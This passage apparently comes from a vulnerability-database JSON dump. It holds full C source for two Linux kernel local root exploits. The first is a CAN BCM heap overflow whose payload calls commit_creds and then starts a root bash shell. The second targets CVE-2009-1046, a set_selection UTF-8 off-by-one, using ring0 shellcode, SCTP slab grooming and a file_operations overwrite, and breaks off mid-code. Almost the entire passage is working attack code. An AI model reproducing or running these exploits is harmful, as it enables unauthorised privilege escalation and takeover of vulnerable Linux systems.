*get_unmapped_area;\r\n\tvoid *check_flags;\r\n\tvoid *flock;\r\n\tvoid *splice_write;\r\n\tvoid *splice_read;\r\n\tvoid *setlease;\r\n} op;\r\n\r\nstruct vfsmount {\r\n\tstruct list_head mnt_hash;\r\n\tvoid *mnt_parent;\r\n\tvoid *mnt_mountpoint;\r\n\tvoid *mnt_root;\r\n\tvoid *mnt_sb;\r\n\tstruct list_head mnt_mounts;\r\n\tstruct list_head mnt_child;\r\n\tint mnt_flags;\r\n\tconst char *mnt_devname;\r\n\tstruct list_head mnt_list;\r\n\tstruct list_head mnt_expire;\r\n\tstruct list_head mnt_share;\r\n\tstruct list_head mnt_slave_list;\r\n\tstruct list_head mnt_slave;\r\n\tstruct vfsmount *mnt_master;\r\n\tstruct mnt_namespace *mnt_ns;\r\n\tint mnt_id;\r\n\tint mnt_group_id;\r\n\tint mnt_count;\r\n} vfsmount;\r\n\r\nstruct file {\r\n\tstruct list_head fu_list;\r\n\tstruct vfsmount *f_vfsmnt;\r\n\tstruct dentry *f_dentry;\r\n\tvoid *f_op;\r\n\tunsigned int f_lock;\r\n\tunsigned long f_count;\r\n} file;\r\n\r\nstruct kern_ipc_perm {\r\n\tunsigned int lock;\r\n\tint deleted;\r\n\tint id;\r\n\tunsigned int key;\r\n\tunsigned int uid;\r\n\tunsigned int gid;\r\n\tunsigned int cuid;\r\n\tunsigned int cgid;\r\n\tunsigned int mode;\r\n\tunsigned int seq;\r\n\tvoid *security;\r\n};\r\n\r\nstruct shmid_kernel {\r\n\tstruct kern_ipc_perm shm_perm;\r\n\tstruct file *shm_file;\r\n\tunsigned long shm_nattch;\r\n\tunsigned long shm_segsz;\r\n\ttime_t shm_atim;\r\n\ttime_t shm_dtim;\r\n\ttime_t shm_ctim;\r\n\tunsigned int shm_cprid;\r\n\tunsigned int shm_lprid;\r\n\tvoid *mlock_user;\r\n} shmid_kernel;\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n\r\nint __attribute__((regparm(3)))\r\nkernel_code(struct file *file, void *vma)\r\n{\r\n\tcommit_creds(prepare_kernel_cred(0));\r\n\treturn -1;\r\n}\r\n\r\nunsigned long\r\nget_symbol(char *name)\r\n{\r\n\tFILE *f;\r\n\tunsigned long addr;\r\n\tchar dummy;\r\n\tchar sname[512];\r\n\tint ret = 0, oldstyle;\r\n\r\n\tf = fopen("/proc/kallsyms", "r");\r\n\tif (f == NULL) {\r\n\t\tf = fopen("/proc/ksyms", "r");\r\n\t\tif (f == NULL)\r\n\t\t\treturn 0;\r\n\t\toldstyle = 1;\r\n\t}\r\n\r\n\twhile (ret != EOF) {\r\n\t\tif (!oldstyle) {\r\n\t\t\tret = fscanf(f, "%p %c %s\\n", (void **) &addr, &dummy, sname);\r\n\t\t} else {\r\n\t\t\tret = fscanf(f, "%p %s\\n", (void **) &addr, sname);\r\n\t\t\tif (ret == 2) {\r\n\t\t\t\tchar *p;\r\n\t\t\t\tif (strstr(sname, "_O/") || strstr(sname, "_S.")) {\r\n\t\t\t\t\tcontinue;\r\n\t\t\t\t}\r\n\t\t\t\tp = strrchr(sname, '_');\r\n\t\t\t\tif (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) {\r\n\t\t\t\t\tp = p - 4;\r\n\t\t\t\t\twhile (p > (char *)sname && *(p - 1) == '_') {\r\n\t\t\t\t\t\tp--;\r\n\t\t\t\t\t}\r\n\t\t\t\t\t*p = '\\0';\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif (ret == 0) {\r\n\t\t\tfscanf(f, "%s\\n", sname);\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\tif (!strcmp(name, sname)) {\r\n\t\t\tprintf("[+] resolved symbol %s to %p\\n", name, (void *) addr);\r\n\t\t\tfclose(f);\r\n\t\t\treturn addr;\r\n\t\t}\r\n\t}\r\n\tfclose(f);\r\n\r\n\treturn 0;\r\n}\r\n\r\nint\r\ncheck_slabinfo(char *cache, int *active_out, int *total_out)\r\n{\r\n\tFILE *fp;\r\n\tchar name[64], slab[256];\r\n\tint active, total, diff;\r\n\r\n\tmemset(slab, 0, sizeof(slab));\r\n\tmemset(name, 0, sizeof(name));\r\n\r\n\tfp = fopen("/proc/slabinfo", "r");\r\n\tif (!fp) {\r\n\t\tprintf("[-] sorry, /proc/slabinfo is not available!");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tfgets(slab, sizeof(slab) - 1, fp);\r\n\twhile (1) {\r\n\t\tfgets(slab, sizeof(slab) - 1, fp);\r\n\t\tsscanf(slab, "%s %u %u", name, &active, &total);\r\n\t\tdiff = total - active;\r\n\t\tif (strcmp(name, cache) == 0) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tfclose(fp);\r\n\r\n\tif (active_out) {\r\n\t\t*active_out = active;\r\n\t}\r\n\tif (total_out) {\r\n\t\t*total_out = total;\r\n\t}\r\n\treturn diff;\r\n}\r\n\r\nvoid\r\ntrigger(void)\r\n{\r\n\tint *shmids;\r\n\tint i, ret, sock, cnt, base, smashed;\r\n\tint diff, active, total, active_new, total_new;\r\n\tint len, sock_len, mmap_len;\r\n\tstruct sockaddr_can addr;\r\n\tstruct bcm_msg_head *msg;\r\n\tvoid *efault;\r\n\tchar *buf;\r\n\r\n\tprintf("[+] creating PF_CAN socket...\\n");\r\n\r\n\tsock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM);\r\n\tif (sock < 0) {\r\n\t\tprintf("[-] kernel lacks CAN packet family support\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] connecting PF_CAN socket...\\n");\r\n\r\n\tmemset(&addr, 0, sizeof(addr));\r\n\taddr.can_family = PF_CAN;\r\n\r\n\tret = connect(sock, (struct sockaddr *) &addr, sizeof(addr));\r\n\tif (sock < 0) {\r\n\t\tprintf("[-] could not connect CAN socket\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tlen = MHSIZ + (CFSIZ * (ALLOCATION / 16));\r\n\tmsg = malloc(len);\r\n\tmemset(msg, 0, len);\r\n\tmsg->can_id = 2959;\r\n\tmsg->nframes = (UINT_MAX / CFSIZ) + (ALLOCATION / 16) + 1;\r\n\r\n\tprintf("[+] clearing out any active OPs via RX_DELETE...\\n");\r\n\t\r\n\tmsg->opcode = RX_DELETE;\r\n\tret = send(sock, msg, len, 0);\r\n\r\n\tprintf("[+] removing any active user-owned shmids...\\n");\r\n\r\n\tsystem("for shmid in `cat /proc/sysvipc/shm | awk '{print $2}'`; do ipcrm -m $shmid > /dev/null 2>&1; done;");\r\n\r\n\tprintf("[+] massaging " SLUB " SLUB cache with dummy allocations\\n");\r\n\r\n\tdiff = check_slabinfo(SLUB, &active, &total);\r\n\r\n\tshmids = malloc(sizeof(int) * diff * 10);\r\n\r\n\tcnt = diff * 10;\r\n\tfor (i = 0; i < cnt; ++i) {\r\n\t\tdiff = check_slabinfo(SLUB, &active, &total);\r\n\t\tif (diff == 0) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tshmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);\r\n\t}\r\n\tbase = i;\r\n\r\n\tif (diff != 0) {\r\n\t\tprintf("[-] inconsistency detected with SLUB cache allocation, please try again\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] corrupting BCM OP with truncated allocation via RX_SETUP...\\n");\r\n\r\n\ti = base;\r\n\tcnt = i + FILLER;\r\n\tfor (; i < cnt; ++i) {\r\n\t\tshmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);\r\n\t}\r\n\r\n\tmsg->opcode = RX_SETUP;\r\n\tret = send(sock, msg, len, 0);\r\n\tif (ret < 0) {\r\n\t\tprintf("[-] kernel rejected malformed CAN header\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\ti = base + FILLER;\r\n\tcnt = i + FILLER;\r\n\tfor (; i < cnt; ++i) {\r\n\t\tshmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);\r\n\t}\r\n\r\n\tprintf("[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...\\n");\r\n\r\n\tmmap_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 3);\r\n\tsock_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 4);\r\n\tefault = mmap(NULL, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n\r\n\tprintf("[+] mmap'ed mapping of length %d at %p\\n", mmap_len, efault);\r\n\r\n\tprintf("[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...\\n");\r\n\r\n\tmsg = (struct bcm_msg_head *) efault;\r\n\tmemset(msg, 0, mmap_len);\r\n\tmsg->can_id = 2959;\r\n\tmsg->nframes = (ALLOCATION / 16) * 4;\r\n\r\n\tmsg->opcode = RX_SETUP;\r\n\tret = send(sock, msg, mmap_len, 0);\r\n\tif (ret != -1 && errno != EFAULT) {\r\n\t\tprintf("[-] couldn't trigger EFAULT, exploit aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] seeking out the smashed shmid_kernel...\\n");\r\n\r\n\ti = base;\r\n\tcnt = i + FILLER + FILLER;\r\n\tfor (; i < cnt; ++i) {\r\n\t\tret = (int) shmat(shmids[i], NULL, SHM_RDONLY);\r\n\t\tif (ret == -1 && errno == EIDRM) {\r\n\t\t\tsmashed = i;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tif (i == cnt) {\r\n\t\tprintf("[-] could not find smashed shmid, trying running the exploit again!\\n");\r\n\t\texit(1);\r\n\t}\r\n\t\r\n\tprintf("[+] discovered our smashed shmid_kernel at shmid[%d] = %d\\n", i, shmids[i]);\r\n\r\n\tprintf("[+] re-smashing the shmid_kernel with exploit payload...\\n");\r\n\r\n\tshmid_kernel.shm_perm.seq = shmids[smashed] / IPCMNI;\r\n\r\n\tbuf = (char *) msg;\r\n\tmemcpy(&buf[MHSIZ + (ALLOCATION * 2) + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel)); \r\n\r\n\tmsg->opcode = RX_SETUP;\r\n\tret = send(sock, msg, mmap_len, 0);\r\n\tif (ret != -1 && errno != EFAULT) {\r\n\t\tprintf("[-] couldn't trigger EFAULT, exploit aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\t\r\n\tret = (int) shmat(shmids[smashed], NULL, SHM_RDONLY);\r\n\tif (ret == -1 && errno != EIDRM) {\r\n\t\tsetresuid(0, 0, 0);\r\n\t\tsetresgid(0, 0, 0);\r\n\r\n\t\tprintf("[+] launching root shell!\\n");\r\n\r\n\t\texecl("/bin/bash", "/bin/bash", NULL);\r\n\t\texit(0);\r\n\t}\r\n\r\n\tprintf("[-] exploit failed! retry?\\n");\r\n}\r\n\r\nvoid\r\nsetup(void)\r\n{\r\n\tprintf("[+] looking for symbols...\\n");\r\n\r\n\tcommit_creds = (_commit_creds) get_symbol("commit_creds");\r\n\tif (!commit_creds) {\r\n\t\tprintf("[-] symbol table not availabe, aborting!\\n");\r\n\t}\r\n\r\n\tprepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");\r\n\tif (!prepare_kernel_cred) {\r\n\t\tprintf("[-] symbol table not availabe, aborting!\\n");\r\n\t}\r\n\r\n\tprintf("[+] setting up exploit payload...\\n");\r\n\r\n\tsuper_block.s_flags = 0;\r\n\r\n\tinode.i_size = 4096;\r\n\tinode.i_sb = &super_block;\r\n\tinode.inotify_watches.next = &inode.inotify_watches;\r\n\tinode.inotify_watches.prev = &inode.inotify_watches;\r\n\tinode.inotify_mutex.count = 1;\r\n\r\n\tdentry.d_count = 4096;\r\n\tdentry.d_flags = 4096;\r\n\tdentry.d_parent = NULL;\r\n\tdentry.d_inode = &inode;\r\n\r\n\top.mmap = &kernel_code;\r\n\top.get_unmapped_area = &kernel_code;\r\n\r\n\tvfsmount.mnt_flags = 0;\r\n\tvfsmount.mnt_count = 1;\r\n\r\n\tfile.fu_list.prev = &file.fu_list;\r\n\tfile.fu_list.next = &file.fu_list;\r\n\tfile.f_dentry = &dentry;\r\n\tfile.f_vfsmnt = &vfsmount;\r\n\tfile.f_op = &op;\r\n\r\n\tshmid_kernel.shm_perm.key = IPC_PRIVATE;\r\n\tshmid_kernel.shm_perm.uid = getuid();\r\n\tshmid_kernel.shm_perm.gid = getgid();\r\n\tshmid_kernel.shm_perm.cuid = getuid();\r\n\tshmid_kernel.shm_perm.cgid = getgid();\r\n\tshmid_kernel.shm_perm.mode = -1;\r\n\tshmid_kernel.shm_file = &file;\r\n}\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tsetup();\r\n\ttrigger();\r\n\treturn 0;\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-69718", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T15:23:48", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1046"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66685", "id": "SSV:66685", "sourceData": "\n /* CVE-2009-1046 Virtual Console UTF-8 set_selection() off-by-one(two) Memory Corruption\r\n * Linux Kernel <= 2.6.28.3 \r\n *\r\n * coded by: sgrakkyu <at> antifork.org\r\n * http://kernelbof.blogspot.com/2009/07/even-when-one-byte-matters.html\r\n *\r\n * Dedicated to all people talking nonsense about non exploitability of kernel heap off-by-one overflow\r\n *\r\n * NOTE-1: you need a virtual console attached to the standard output (stdout) \r\n * - physical login\r\n * - ptrace() against some process with the same uid already attached to a VC\r\n * - remote management ..\r\n *\r\n * NOTE-2: UTF-8 character used is: U+253C - it seems to be supported in most standard console fonts\r\n * but if it's _not_: change it (and change respectively STREAM_ZERO and STREAM_ZERO_ALT defines)\r\n * If you use an unsupported character expect some sort of recursive fatal ooops:)\r\n *\r\n * Designed to be built as x86-64 binary only (SLUB ONLY)\r\n * SCTP stack has to be available\r\n * \r\n * Tested on target:\r\n * Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)\r\n * Ubuntu 8.10 x86_64 (2.6.27_7-10 genric/server)\r\n * Fedora Core 10 x86_64 (default installed kernel - without selinux)\r\n *\r\n */\r\n\r\n\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sched.h>\r\n#include <errno.h>\r\n#include <netinet/in.h>\r\n#include <netinet/sctp.h>\r\n#include <arpa/inet.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <sys/ioctl.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <linux/tiocl.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <signal.h>\r\n#include <sys/mman.h>\r\n#include <sched.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n\r\n#ifndef __x86_64__\r\n#error "Architecture Unsupported"\r\n#error "This code was written for x86-64 target and has to be built as x86-64 binary"\r\n#else\r\n\r\n#ifndef __u8\r\n#define __u8 uint8_t\r\n#endif\r\n#ifndef __u16\r\n#define __u16 uint16_t\r\n#endif\r\n#ifndef __u32\r\n#define __u32 uint32_t\r\n#endif\r\n#ifndef __u64 \r\n#define __u64 uint64_t\r\n#endif\r\n\r\n\r\n#define STREAM_ZERO 10\r\n#define STREAM_ZERO_ALT 12\r\n\r\n#define SCTP_STREAM 22\r\n#define STACK_SIZE 0x1000\r\n#define PAGE_SIZE 0x1000\r\n#define STRUCT_PAGE 0x0000000000000000\r\n#define STRUCT_PAGE_ALT 0x0000000100000000 \r\n#define CODE_PAGE 0x0000000000010000\r\n#define LOCALHOST "127.0.0.1"\r\n#define KMALLOC "kmalloc-128"\r\n#define TIMER_LIST_FOPS "timer_list_fops"\r\n\r\n#define __msg_f(format, args...) \\\r\n do { fprintf(stdout, format, ## args); } while(0)\r\n\r\n#define __msg(msg) \\\r\n do { fprintf(stdout, "%s", msg); } while(0)\r\n\r\n#define __fatal_errno(msg) \\\r\ndo { perror(msg); __free_stuff(); exit(1); } while(0)\r\n\r\n#define __fatal(msg) \\\r\ndo { fprintf(stderr, msg); __free_stuff(); exit(1); } while(0)\r\n\r\n\r\n\r\n#define CJUMP_OFF 13\r\nchar ring0[]=\r\n"\\x57" // push %rdi\r\n"\\x50" // push %rax\r\n"\\x65\\x48\\x8b\\x3c\\x25\\x00\\x00\\x00\\x00" // mov %gs:0x0,%rdi\r\n"\\x48\\xb8\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41" // mov xxx, %rax\r\n"\\xff\\xd0" // callq *%rax\r\n"\\x58" // pop %rax\r\n"\\x5f" // pop %rdi\r\n"\\xc3"; // retq\r\n\r\n\r\n/* conn struct */\r\nstatic __u16 srvport;\r\nstruct sockaddr_in server_s;\r\nstatic struct sockaddr_in caddr;\r\n\r\n/* some fds.. */\r\nstatic int g_array[10];\r\nstatic int fd_zmap_srv=-1;\r\nstatic int kmalloc_fd=-1;\r\nstatic int unsafe_fd[4] = {-1,-1,-1,-1}; \r\n\r\n/* misc */\r\nstatic int dorec = 0, cankill=1, highpage=0;\r\nstatic char cstack[STACK_SIZE*2];\r\nstatic __u16 zstream=STREAM_ZERO;\r\nstatic __u32 uid,gid;\r\nstatic __u64 fops;\r\nstatic pid_t child=0;\r\nstatic char symbuf[20000];\r\n\r\nstatic void __free_stuff()\r\n{\r\n int i;\r\n for(i=3; i<2048; i++) \r\n {\r\n if((unsafe_fd[0] == i || unsafe_fd[1] == i || \r\n unsafe_fd[2] == i || unsafe_fd[3] == i))\r\n continue; \r\n\r\n close(i);\r\n }\r\n}\r\n\r\nstatic void bindcpu()\r\n{\r\n cpu_set_t set;\r\n CPU_ZERO(&set);\r\n CPU_SET(0, &set);\r\n \r\n if(sched_setaffinity(0, sizeof(cpu_set_t), &set) < 0)\r\n __fatal_errno("setaffinity");\r\n}\r\n\r\n/* parse functions are not bof-free:) */\r\nstatic __u64 get_fops_addr()\r\n{\r\n FILE* stream;\r\n char fbuf[256];\r\n char addr[32];\r\n \r\n stream = fopen("/proc/kallsyms", "r");\r\n if(stream < 0)\r\n __fatal_errno("open: kallsyms");\r\n\r\n memset(fbuf, 0x00, sizeof(fbuf));\r\n while(fgets(fbuf, 256, stream) > 0)\r\n {\r\n char *p = fbuf;\r\n char *a = addr;\r\n memset(addr, 0x00, sizeof(addr));\r\n fbuf[strlen(fbuf)-1] = 0;\r\n while(*p != ' ')\r\n *a++ = *p++; \r\n p += 3;\r\n if(!strcmp(p, TIMER_LIST_FOPS))\r\n return strtoul(addr, NULL, 16); \r\n }\r\n\r\n return 0;\r\n}\r\n\r\nstatic int get_total_object(int fd)\r\n{\r\n char name[32];\r\n char used[32];\r\n char total[32];\r\n char *ptr[] = {name, used, total};\r\n int ret,i,toread=sizeof(symbuf)-1;\r\n char *p = symbuf;\r\n\r\n lseek(fd, 0, SEEK_SET);\r\n memset(symbuf, 0x00, sizeof(symbuf));\r\n while( (ret = read(fd, p, toread)) > 0)\r\n {\r\n p += ret; \r\n toread -= ret;\r\n }\r\n\r\n p = symbuf;\r\n do\r\n {\r\n for(i=0; i<sizeof(ptr)/sizeof(void*); i++)\r\n {\r\n char *d = ptr[i];\r\n while(*p != ' ')\r\n *d++ = *p++; \r\n *d = 0;\r\n while(*p == ' ')\r\n p++;\r\n }\r\n \r\n while(*p++ != '\\n');\r\n \r\n if(!strcmp(KMALLOC, name))\r\n return atoi(total); \r\n\r\n } while(*p != 0);\r\n return 0;\r\n}\r\n\r\n\r\nstatic void ring0c(void* t)\r\n{\r\n int i;\r\n __u32 *p = t;\r\n for(i=0; i<1100; i++,p++)\r\n {\r\n if(p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid &&\r\n p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid)\r\n {\r\n p[0] = p[1] = p[2] = p[3] = 0;\r\n p[4] = p[5] = p[6] = p[7] = 0;\r\n /* dont care about caps */\r\n break;\r\n }\r\n }\r\n}\r\n\r\n\r\nstatic int get_kmalloc_fd()\r\n{\r\n int fd;\r\n fd = open("/proc/slabinfo", O_RDONLY);\r\n if(fd < 0)\r\n __fatal_errno("open: slabinfo");\r\n return fd;\r\n}\r\n\r\n\r\nstatic int write_sctp(int fd, struct sockaddr_in *s, int channel)\r\n{\r\n int ret;\r\n ret = sctp_sendmsg(fd, "a", 1,\r\n (struct sockaddr *)s, sizeof(struct sockaddr_in),\r\n 0, 0, channel, 0 ,0);\r\n return ret;\r\n}\r\n\r\n\r\nstatic void set_sctp_sock_opt(int fd, __u16 in, __u16 out)\r\n{\r\n struct sctp_initmsg msg;\r\n int val=1;\r\n socklen_t len_sctp = sizeof(struct sctp_initmsg);\r\n getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp);\r\n msg.sinit_num_ostreams=out; \r\n msg.sinit_max_instreams=in;\r\n setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp);\r\n setsockopt(fd, SOL_SCTP, SCTP_NODELAY, (char*)&val, sizeof(val));\r\n}\r\n\r\n\r\nstatic int create_and_init(void)\r\n{\r\n int fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);\r\n if(fd < 0)\r\n __fatal_errno("socket: sctp");\r\n set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM);\r\n return fd;\r\n}\r\n\r\n\r\nstatic void connect_peer(int fd, struct sockaddr_in *s)\r\n{ \r\n int ret;\r\n ret = connect(fd, (struct sockaddr *)s, sizeof(struct sockaddr_in));\r\n if(ret < 0)\r\n __fatal_errno("connect: one peer");\r\n}\r\n\r\n\r\nstatic void conn_and_write(int fd, struct sockaddr_in *s, __u16 stream)\r\n{\r\n connect_peer(fd,s);\r\n write_sctp(fd, s, stream);\r\n}\r\n\r\n\r\nstatic int clone_thread(void*useless)\r\n{\r\n int o = 1;\r\n int c=0,idx=0;\r\n int fd, ret;\r\n struct sockaddr_in tmp;\r\n socklen_t len;\r\n\r\n bindcpu();\r\n server_s.sin_family = PF_INET;\r\n server_s.sin_port = htons(srvport); \r\n server_s.sin_addr.s_addr = inet_addr(LOCALHOST);\r\n\r\n fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);\r\n if(fd < 0)\r\n return -1;\r\n\r\n set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM); \r\n setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o));\r\n\r\n ret = bind(fd, (struct sockaddr *)&server_s, sizeof(struct sockaddr_in));\r\n if(ret < 0)\r\n return -1;\r\n\r\n ret = listen(fd, 100);\r\n if(ret < 0)\r\n return -1;\r\n\r\n len = sizeof(struct sockaddr_in);\r\n while((ret = accept(fd, (struct sockaddr *)&tmp, &len)) >= 0)\r\n {\r\n if(dorec != 0 && c >= dorec && idx < 10)\r\n {\r\n g_array[idx] = ret;\r\n if(idx==9)\r\n {\r\n fd_zmap_srv = ret;\r\n caddr = tmp;\r\n break;\r\n }\r\n idx++;\r\n }\r\n c++; \r\n write_sctp(ret, &tmp, zstream);\r\n }\r\n \r\n sleep(1);\r\n return 0; \r\n}\r\n\r\n\r\nstatic int do_mmap(unsigned long base, int npages)\r\n{\r\n void*addr = mmap((void*)base, PAGE_SIZE*npages,\r\n PROT_READ|PROT_WRITE|PROT_EXEC, \r\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);\r\n\r\n if(MAP_FAILED == addr)\r\n return -1;\r\n\r\n memset(addr, 0x00, PAGE_SIZE*npages);\r\n \r\n return 0;\r\n}\r\n\r\npid_t start_listener()\r\n{\r\n pid_t pid;\r\n pid = clone(clone_thread, cstack+STACK_SIZE-8, \r\n CLONE_VM|CLONE_FILES|SIGCHLD, NULL);\r\n \r\n return pid;\r\n} \r\n\r\nstatic void do_socks(struct sockaddr_in *s, __u16 stream)\r\n{\r\n int i,fd;\r\n int n_objs = get_total_object(kmalloc_fd), tmp_n_objs;\r\n int next=8;\r\n\r\n for(i=0; next != 0; i++)\r\n {\r\n fd = create_and_init();\r\n\r\n tmp_n_objs = get_total_object(kmalloc_fd); \r\n if(!dorec && tmp_n_objs != n_objs)\r\n dorec=i; \r\n\r\n conn_and_write(fd, s, stream);\r\n if(dorec)\r\n next--;\r\n }\r\n}\r\n\r\n\r\nstatic void clr(int fd)\r\n{\r\n /* use termcap instead..*/\r\n write(fd, "\\33[H\\33[J", 6); \r\n}\r\n\r\nstatic char tiobuffer[2048];\r\nvoid alloc_tioclinux()\r\n{\r\n int i;\r\n char out[128*3];\r\n /* Unicode Character 'BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL' (U+253C) */\r\n char utf8[3] = { 0xE2, 0x94, 0xBC }; \r\n //char utf8[3] = { 0xE2, 0x80, 0xBC }; \r\n struct tiocl_selection *sel;\r\n char *t;\r\n void *v = malloc(sizeof(struct tiocl_selection) + 1);\r\n t = (char*)v; \r\n sel = (struct tiocl_selection *)(t+1);\r\n memset(out, 0x41, sizeof(out)); \r\n for(i=0; i<128; i++) \r\n {\r\n tiobuffer[(i*3)]=utf8[0];\r\n tiobuffer[(i*3)+1]=utf8[1];\r\n tiobuffer[(i*3)+2]=utf8[2];\r\n }\r\n\r\n *t = TIOCL_SETSEL;\r\n sel->xs = 1;\r\n sel->ys = 1;\r\n sel->xe = 43;\r\n //sel->xe = 42; /* no overflow */\r\n sel->ye = 1;\r\n \r\n write(1, tiobuffer, sizeof(tiobuffer));\r\n if(ioctl(1, TIOCLINUX, v) < 0)\r\n __fatal("[!!] Unable to call TIOCLINUX ioctl(), need stdout to be on a virtual console\\n");\r\n}\r\n\r\n\r\n\r\nstatic void migrate_evil_fd()\r\n{\r\n int i;\r\n pid_t child;\r\n\r\n __msg("[**] Migrate evil unsafe fds to child process..\\n");\r\n child = fork();\r\n if(!child)\r\n {\r\n\r\n /* preserve evil fds */\r\n setsid(); \r\n if(!cankill) /* cant die .. */\r\n while(1)\r\n sleep(1);\r\n else\r\n {\r\n sleep(10); /* wait execve() before */ \r\n for(i=0; i<4; i++)\r\n close(unsafe_fd[i]); \r\n\r\n exit(1);\r\n }\r\n }\r\n else\r\n {\r\n if(!cankill)\r\n __msg_f("[**] Child process %d _MUST_ NOT die ... keep it alive:)\\n", child);\r\n }\r\n}\r\n\r\n\r\nstatic void trigger_fault()\r\n{\r\n char *argv[]={"/bin/sh", NULL};\r\n int fd,i;\r\n\r\n fd = open("/proc/timer_list", O_RDONLY);\r\n if(fd >= 0)\r\n {\r\n ioctl(fd, 0, 0);\r\n __free_stuff();\r\n migrate_evil_fd();\r\n \r\n for(i=0; i<4; i++)\r\n close(unsafe_fd[i]);\r\n\r\n if(!getuid())\r\n {\r\n __msg("[**] Got root!\\n");\r\n execve("/bin/sh", argv, NULL); \r\n }\r\n }\r\n else\r\n {\r\n __msg("[**] Cannot open /proc/timer_list");\r\n __free_stuff();\r\n }\r\n}\r\n\r\n\r\n\r\nstatic void overwrite_fops( int sender, \r\n struct sockaddr_in *to_receiver,\r\n int receiver)\r\n{\r\n char *p = NULL;\r\n if(!highpage)\r\n p++;\r\n else\r\n p = (void*)STRUCT_PAGE_ALT;\r\n\r\n __u64 *uip = (__u64*)p; \r\n *uip = fops;\r\n write_sctp(sender, to_receiver, 1); \r\n sleep(1);\r\n trigger_fault();\r\n}\r\n\r\nstatic __u16 get_port()\r\n{\r\n __u16 r = (__u16)getpid();\r\n if(r <= 0x400)\r\n r+=0x400;\r\n return r;\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n int peerx, peery,i;\r\n __u64 *patch;\r\n\r\n srvport = get_port();\r\n\r\n uid=getuid();\r\n gid=getgid();\r\n fops=get_fops_addr() + 64; \r\n if(!fops)\r\n {\r\n __msg("[!!] Unable to locate symbols...\\n");\r\n return 1;\r\n }\r\n\r\n __msg_f("[**] Patching ring0 shellcode with userspace addr: %p\\n", ring0c);\r\n patch = (__u64*)(ring0 + CJUMP_OFF);\r\n *patch = (__u64)ring0c;\r\n\r\n __msg_f("[**] Using port: %d\\n", srvport);\r\n __msg("[**] Getting slab info...\\n");\r\n kmalloc_fd = get_kmalloc_fd();\r\n if(!get_total_object(kmalloc_fd)) \r\n __fatal("[!!] Only SLUB allocator supported\\n");\r\n \r\n\r\n __msg("[**] Mapping Segments...\\n"); \r\n __msg("[**] Trying mapping safe page...");\r\n if(do_mmap(STRUCT_PAGE, 1) < 0)\r\n {\r\n __msg("Page Protection Present (Unable to Map Safe Page)\\n");\r\n __msg("[**] Mapping High Address Page (dont kill placeholder child)\\n");\r\n if(do_mmap(STRUCT_PAGE_ALT, 1) < 0)\r\n __fatal_errno("mmap"); \r\n\r\n cankill=0; /* dont kill child owning unsafe fds.. */\r\n highpage=1; /* ssnmap in higher pages */\r\n zstream=STREAM_ZERO_ALT; \r\n } \r\n else\r\n __msg("Done\\n");\r\n\r\n __msg("[**] Mapping Code Page... ");\r\n if(do_mmap(CODE_PAGE, 1) < 0)\r\n __fatal_errno("mmap");\r\n else\r\n __msg("Done\\n");\r\n\r\n memcpy((void*)CODE_PAGE, ring0, sizeof(ring0));\r\n\r\n __msg("[**] Binding on CPU 